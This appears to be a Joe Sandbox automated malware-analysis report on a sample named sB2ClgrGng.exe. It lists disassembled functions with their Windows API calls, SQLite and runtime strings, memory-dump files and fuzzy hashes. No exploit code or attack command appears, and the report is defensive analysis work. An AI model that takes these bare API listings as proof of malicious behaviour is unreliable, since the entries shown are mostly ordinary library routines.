Function 00007FF64488577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6448857AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF644885811
GetLastError.KERNEL32 ref: 00007FF6448858A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6448856B4), ref: 00007FF6448858EE

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 91ef1a346178f1b4215449e647d744ae0f94e7b1c4b2e4dc143589f49324fc34
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 6D514922E086458EFB10FFB1D4923BE27A1BB88B98F148935DE0D9B689DF38D4519740

Function 00007FFDFAF341C0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF34235
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF34259
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF34278
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF34290

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID:
API String ID: 1405196051-0
Opcode ID: 65c167b629d3beafb1ba237e326e94310d99c22fee7a7913818827570b6759f6
Instruction ID: 828ef19d08c3ebaa426a1ecb69d7b3754a94a6437d36952273e13239f9f767ea
Opcode Fuzzy Hash: 65c167b629d3beafb1ba237e326e94310d99c22fee7a7913818827570b6759f6
Instruction Fuzzy Hash: FC21C166B1974283D764AB16B5515BEA3A1FF497C0B085130EFDE8BFAACF2CE0408700

Function 00007FF6448720C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6448720F4
SetWindowLongPtrW.USER32 ref: 00007FF644872116
GetWindowLongPtrW.USER32 ref: 00007FF644872140
InvalidateRect.USER32 ref: 00007FF644872160

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: a73301727956a14f1d39932d440ae04c9602998f35d50b685e71cc81e6548ac6
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 7C110C21F0C54286F654B7A9E9D62799292FFC57C0F444030DF4947B9ECD3DE4D59210

Function 00007FFDF8552BEC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDF8552C18
GetCurrentThreadId.KERNEL32 ref: 00007FFDF8552C26
GetCurrentProcessId.KERNEL32 ref: 00007FFDF8552C32
QueryPerformanceCounter.KERNEL32 ref: 00007FFDF8552C42

Memory Dump Source

Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true

Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
Instruction ID: be3ee30887ca8f0029d80316d1a4bcd3172d651a97e36280038bccd9643483fe
Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
Instruction Fuzzy Hash: 73112E36B14F018AEB00CF60EC646B933A4FB19758F441E31DA6D4ABA8DF78E1548381

Function 00007FF64487D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF64487D03C
GetCurrentThreadId.KERNEL32 ref: 00007FF64487D04A
GetCurrentProcessId.KERNEL32 ref: 00007FF64487D056
QueryPerformanceCounter.KERNEL32 ref: 00007FF64487D066

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 5b4465ad599c622c6c306571a197281bc630650e0555362a133ebd215f61e20f
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: D6110A22B18F05CAEB00AB60E8952B933A4FB59B58F441E31DE6D86BA8DF78D1548340

Function 00007FFDFAF0DCA4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF0E031

Strings

out of memory, xrefs: 00007FFDFAF12498
string or blob too big, xrefs: 00007FFDFAF12123

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: out of memory$string or blob too big
API String ID: 1405196051-2410398255
Opcode ID: ffd83403d962cb9622be468eb35632afa7cd7601ff9c824643abc7a704723041
Instruction ID: 6bacf44a3bb805746c3a46dc6dde3e3503561a24cf96ea278537a2744fbe411b
Opcode Fuzzy Hash: ffd83403d962cb9622be468eb35632afa7cd7601ff9c824643abc7a704723041
Instruction Fuzzy Hash: EBC1FB22F0966382FB289A25C560B7C6790EF11794F08C675EB6E5B7DDEF2CE4458310

Function 00007FFDFAF406B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF40852
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF4086B

Strings

string or blob too big, xrefs: 00007FFDFAF4097D

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: string or blob too big
API String ID: 1405196051-2803948771
Opcode ID: ee11977c9bbd5640f85a55ce44c5accef6eb3f1d27a3fd4689aa64be97da6381
Instruction ID: e4dded0dd8e844c613ceebdfc174dcd47765cdf33a8308cb737d89c736d83580
Opcode Fuzzy Hash: ee11977c9bbd5640f85a55ce44c5accef6eb3f1d27a3fd4689aa64be97da6381
Instruction Fuzzy Hash: 9F91CD21F0D20385FB6C9B01D564B7927A0AF81BA4F084279EE6D0B3DADE3DEA418741

Function 00007FFDFAF1CEC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF1D150

Strings

variable number must be between ?1 and ?%d, xrefs: 00007FFDFAF1D066
too many SQL variables, xrefs: 00007FFDFAF1D172

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 1405196051-515162456
Opcode ID: c2fef2437538cd055f97cac125a56830f20ac4153c52bdafaefb5b5562f9caec
Instruction ID: 9f5d5c451aa76e992de38877e5dbee149c79caf6425628cb63cd50385bd5220a
Opcode Fuzzy Hash: c2fef2437538cd055f97cac125a56830f20ac4153c52bdafaefb5b5562f9caec
Instruction Fuzzy Hash: C681DF72B09682A5EB18DB11D464AB977B5FF44B98F558276EA6C0B2CCDF3CE541C300

Function 00007FFDFAF3A960 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF3AA0D

Strings

BINARY, xrefs: 00007FFDFAF3A96C
no such collation sequence: %s, xrefs: 00007FFDFAF3ABAC

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: BINARY$no such collation sequence: %s
API String ID: 1405196051-2451720372
Opcode ID: ca68934a46a8b85495a901118d2f0107886c9b3b238559e4aeab701865ea2892
Instruction ID: 669a77a716af2113a031128eb34a8d62ee25577763a93d9b6143cfcffe83ecd5
Opcode Fuzzy Hash: ca68934a46a8b85495a901118d2f0107886c9b3b238559e4aeab701865ea2892
Instruction Fuzzy Hash: C8719222B18B4191EF18AF228564BB96391EF55BA4F4843B5EE3D0B2C9DF3DE1958340

Function 00007FFDFAF39A70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

index '%q', xrefs: 00007FFDFAF39AC2

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: index '%q'
API String ID: 0-1628151297
Opcode ID: a0ae6ca9fcd77d1787e8a0e907a6e2fe84000f5d14babccdade458f1703f2acf
Instruction ID: e668dd21c5125a42e1cac67f04d522fbb8f933f6eb141ca14782a950766b9b3c
Opcode Fuzzy Hash: a0ae6ca9fcd77d1787e8a0e907a6e2fe84000f5d14babccdade458f1703f2acf
Instruction Fuzzy Hash: 3C71A536F0865689E7149B65D4A0ABC37A0BB447A8F0406B5EE7A57BD8DF389581C700

Function 00007FFDFAED4A10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAED4BAC

Strings

%02d, xrefs: 00007FFDFAED4B4E, 00007FFDFAED4BB5

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %02d
API String ID: 1405196051-896308400
Opcode ID: d92aa4ce4f78bd2e745dabe2cc4c8f7c1ebffc5174309bcbfd2f6d9e3b517c72
Instruction ID: db28c23c99e5d8464a57b05702cdc4ce76cd9fbeae7861b7a7fa99431928e414
Opcode Fuzzy Hash: d92aa4ce4f78bd2e745dabe2cc4c8f7c1ebffc5174309bcbfd2f6d9e3b517c72
Instruction Fuzzy Hash: 4D71D232B1868285E728AB64D060BFD7764FB94788F044171EE9E17A9DDE3AE485CB00

Function 00007FFDFAF6D7E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFAF6DA8A,?,?,?,00007FFDFAF6DE4B), ref: 00007FFDFAF6D9F7

Strings

CRE, xrefs: 00007FFDFAF6D93F
INS, xrefs: 00007FFDFAF6D959

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: CRE$INS
API String ID: 1405196051-4116259516
Opcode ID: 5a3376a481f4e1d4c96cc6b6d9d4c5f91b43d14b4293a1d11514fe7dd44e2b73
Instruction ID: e54a528eb3b3a43521b291ec929516ce32c2996d5ca6c8b8ab7619733e70e7ee
Opcode Fuzzy Hash: 5a3376a481f4e1d4c96cc6b6d9d4c5f91b43d14b4293a1d11514fe7dd44e2b73
Instruction Fuzzy Hash: 4F51D121B0DA4280FB289B269464B796391AF81FE4F584275EDAD4F7DDEE3DE8419300

Function 00007FFDFAF208BA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF20A52

Strings

%sSCALAR SUBQUERY %d, xrefs: 00007FFDFAF208E2
CORRELATED , xrefs: 00007FFDFAF208D8

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %sSCALAR SUBQUERY %d$CORRELATED
API String ID: 1405196051-3437972362
Opcode ID: b115121a64648f4ae5b9ff8029ecb236f9238a45bec9cd0bf403c8d6410345e6
Instruction ID: 17f9fd7da4b676d81a779a2714216b644b224af12739f0614da0b857ebc27468
Opcode Fuzzy Hash: b115121a64648f4ae5b9ff8029ecb236f9238a45bec9cd0bf403c8d6410345e6
Instruction Fuzzy Hash: 78719272B087818BE764CF25D450A6A77A0FB85794F444275EBAD47BD9DB3CE850CB00

Function 00007FF644895B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF644891760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644891793

_get_daylight.LIBCMT ref: 00007FF644895C34
_get_daylight.LIBCMT ref: 00007FF644895C45

Strings

?, xrefs: 00007FF644895BC5

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction ID: 09c06f490ac8816fbc27c8c6d1364462711493603c501fad9900685126725f33
Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction Fuzzy Hash: A841F913A0CA82DAF764B725D5933796B90EF80BA4F144235EE5C86ADDDF3ED4418700

Function 00007FF644889014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644889046

Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF64487CBA5), ref: 00007FF644889064

Strings

C:\Users\user\Desktop\sB2ClgrGng.exe, xrefs: 00007FF644889052

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\sB2ClgrGng.exe
API String ID: 3580290477-2965912956
Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction ID: 32b3f3127922d3cd5c9320172619681a085a3b7bba5847fb0bf508917d675777
Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction Fuzzy Hash: 23413936A0CA528EEB15BF2598C20B967A5EF45BD4B564035ED4E87B89DF3CE481C300

Function 00007FFDFAED9870 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAED998E
00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAED99D2

Strings

@, xrefs: 00007FFDFAED99BC

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: @
API String ID: 1405196051-2766056989
Opcode ID: 4f90f53215605e3b183ac4adea1687a30c3e64344693984ba208431b3d7bf61b
Instruction ID: 5251c017dc6c0cac29c482dce9e65ea293d3cdc315ab1d4abd0de71074f9ee33
Opcode Fuzzy Hash: 4f90f53215605e3b183ac4adea1687a30c3e64344693984ba208431b3d7bf61b
Instruction Fuzzy Hash: 15418D24F1F78786FB699B116878D7527A0AF067C0F0C41B9D86E466ECDF3EA4809700

Function 00007FF64488CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF64488CD4F
GetLastError.KERNEL32 ref: 00007FF64488CD71

Strings

U, xrefs: 00007FF64488CCFB

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
